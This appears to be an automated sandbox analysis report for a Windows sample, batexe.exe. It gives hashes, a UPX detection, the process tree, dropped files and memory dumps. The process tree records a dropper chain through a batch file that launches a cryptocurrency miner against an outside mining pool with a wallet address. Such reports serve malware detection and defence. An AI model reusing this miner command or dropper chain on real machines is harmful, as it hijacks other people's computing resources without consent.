73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
297s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12/02/2024, 03:59

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4596	b2e.exe
4104	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4104	cpuminer-sse2.exe
4104	cpuminer-sse2.exe
4104	cpuminer-sse2.exe
4104	cpuminer-sse2.exe
4104	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4224-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4224 wrote to memory of 4596	4224	batexe.exe	38
PID 4224 wrote to memory of 4596	4224	batexe.exe	38
PID 4224 wrote to memory of 4596	4224	batexe.exe	38
PID 4596 wrote to memory of 2212	4596	b2e.exe	49
PID 4596 wrote to memory of 2212	4596	b2e.exe	49
PID 4596 wrote to memory of 2212	4596	b2e.exe	49
PID 2212 wrote to memory of 4104	2212	cmd.exe	52
PID 2212 wrote to memory of 4104	2212	cmd.exe	52

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4224
- C:\Users\Admin\AppData\Local\Temp\9848.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9848.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9848.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\99DE.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2212
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9848.tmp\b2e.exe

Filesize
166KB

MD5
76563bbb7e8b1b39b4f8671722baae52

SHA1
d9977606e76b28bdf2c39cd268ca571ab746469f

SHA256
bc1a5c426f1fae8fdc691a31132ece8747e2936735b23367a5e24bd52d6e5960

SHA512
8cbe3b757b35efe17ce666f1014cc3dc36a19511ae5185edf84f045da869018370e367ce6d40852873ca5c2363f7b8e7c244666bcce5a208c79f29e3d3c377cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\9848.tmp\b2e.exe

Filesize
89KB

MD5
1f86057a46aa0d3095f80a313d63d656

SHA1
377a41597770aec04993ec425e88a04b4e4656ae

SHA256
6e9fb7b3d7b09b7322cdda2eb4f4ac9dd7ddfb692c3dd155d8403839a4860f33

SHA512
53dc3dfe9a98fa2b5c13d30a8e61e9b7882ba11314712f68f7d60db97a6a73f44d94f7d66bf2a27d2b4e414355e6bc5fa2bd0ff0b7c9cea053a1b70df1357cb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\99DE.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
11KB

MD5
cfa72f5f80ca3bf7cb369c67a0ed8efb

SHA1
c90fa69c8f501d3fa3e69c1e2d9e10860292ce09

SHA256
2727c02dde4b98c6ade092d56178ed872276af6019539cd10c29e968bc402566

SHA512
9e46f6c1699319785bde41d3bc28b94a87e46d12b4c3bf9a373cc6c87761154aba5e3c62a0485cc6376596e411b65960c48a281bf59ebc8cbf859828c3b71ea0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
488KB

MD5
48d6afd4f11f598b71657e7f2611a823

SHA1
baa169ca6d9f02b810fcd60a1282200f376d86d3

SHA256
ec95232a90a6d1c0804209c9fd8e70d6a1a13487b40eaaeecadacc4e16186502

SHA512
32fe05cf4d421628fc930450b8082c17dafce114db53d88db4f24639632a8386226cbe5423f5e65261441fe80494e0dcd6679c404a80acdb7914a1fe3bbd89d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
325KB

MD5
234044dc478892e3d429a22c11cc1abf

SHA1
19f60ef25feea388ecc5fe85e9d79565c51421e7

SHA256
c7a5aa74705c9310c5748d9d1f21007cb46537756b01baa664907bd2972c95f3

SHA512
dcc01e7fd1c5a3e63dda3d5cba172302e4454ad0c03701713c4ba90a73d7e7cf766b7522c0aecd3eac3416372335006f21293feda7844c8bdf51f2f96a7eb0ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
458KB

MD5
aef10187a5cf39b3877e994818c9f770

SHA1
5e4990bdaa628d731b7b609d7426454e285795f8

SHA256
e96f99c993bb1124800ddb311c5722605dbc078eeb5bf1994ec78d8a60d6ee87

SHA512
efdfa72161ca7a458bdc36cce0471f3b54ded7b9a85b7172344e45699e975bd2bc3b7de2dde0551ed449b759838f21e33b5fb02800f613007603fff7f3ed8de4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
486KB

MD5
7c65f0450d9ed2990ee2f3f818e95a7d

SHA1
ec32db905da2304ce45d57557598eab2d096ed9a

SHA256
6ade8489459cba3a0f7fcf657370193710245b3709e3126e1412572358b5ca2a

SHA512
57dcf90befdf219aadee1e206275892aeb167b79fc6a9a792c58de9259e52a34316ba5ce07a25611531c7772a22a34671bf33d7a924d0cafa45f2ccafa985204

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
491KB

MD5
d9c188e3aa1bcd8126f93b6bceebbcfd

SHA1
faa72a3483f2cf3726afd8c9a41413d04ab71366

SHA256
14b32c0a177a8e66688708413255c5c5455e8710c979964032bbb830df9b1aa2

SHA512
2b2a6d95bd075fe81b55754943ea2d1935da973d0887e0247d97884413dbc90007ccc77f61016cd87be561524c1c359886127afca146cdc1688cd25a8c67f21c

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
508KB

MD5
d33a9c289cbe0044fabced888ccb7e59

SHA1
5b9e3904a8f0ee85a5ed2f51d47e5b53acb87a86

SHA256
bfac568c65b4d2ae5fae0d97106dc71b2a8cbb5d807b08868808768506743597

SHA512
a190fccad7494fce1e778fa010cb2fe3d9752884ca80dbe28d8015418fb136b3a6e3f46e8f28d4e74bc8dcdd84c2e6813e88dd655ff79d140520815dec2b3c7a

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
403KB

MD5
e0477a13cf62a138493b7491f0e36f7c

SHA1
01fbce207ccc15a019d0a28d09a1713dc95c453c

SHA256
de19566cac17d7e8f44427b4439fda755c5bd51e4b10531959419adfdadaf567

SHA512
f3fecb889741d1270cf5650906101a385a6d53f91c8246ae70ef1f4e4bea50b9f37a402e4aa210ac3751eeb73fca80f977da99da91611c5e65524dfe8871d1d8

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
525KB

MD5
b742e5ca7f5dd9a679434776f9189938

SHA1
2cd25fa3ea9e7283768ebc49476a866f7ba58710

SHA256
74ee5fbfddc68441a57b2a5c2e958e7506b6773a5f482b690d7bb1958edb255c

SHA512
2bdd3bb248810b9d81df314d5dd5bd1987d2aeed53885784122436d88a1605cd668cd926b6dffb24cd9ee781ae466be47b2a740277cfb2ddb222890400d9b604

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
74KB

MD5
1ea9a212c7d0cda19c5dbe7985dc1cd4

SHA1
4a29ae561ff93f0ac89c2f431693e21d6a75beec

SHA256
0a42869a7f33e5db20ec5c68f090e1bd0bc0f29150a7e2be705d1bcbdc95bc26

SHA512
c8217ec34e506806a2b1be13fd0d0233443deb43b836997f203341bea129274514fc1da82c4a11c2b7ebc8ca7f44b982d718fa33a719f9c9dfb7ab076920ce7f

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
533KB

MD5
3496da7cdd8077ae7b4f7b007333e843

SHA1
ac31766fe447d430d5c11cdf79805f587713b700

SHA256
b9e526520b72bd7371ccc9219a5d2d2bcfd07a05c01b4192733fa268f7467403

SHA512
e71e5746ed99b0f2ef04d470c18a18f031f9de1c5ec3ceb5baf9bca2aa7c3444857391334dbebf587935f4448c6d04561491b5482dbdc4f73f58bd4261a987be

Download Submit
memory/4104-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4104-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4104-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4104-42-0x0000000052760000-0x00000000527F8000-memory.dmp

Filesize
608KB

Download
memory/4104-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4104-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4104-44-0x0000000001120000-0x00000000029D5000-memory.dmp

Filesize
24.7MB

Download
memory/4104-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4104-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4104-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4104-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4104-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4104-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4104-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4104-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4224-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4596-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4596-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download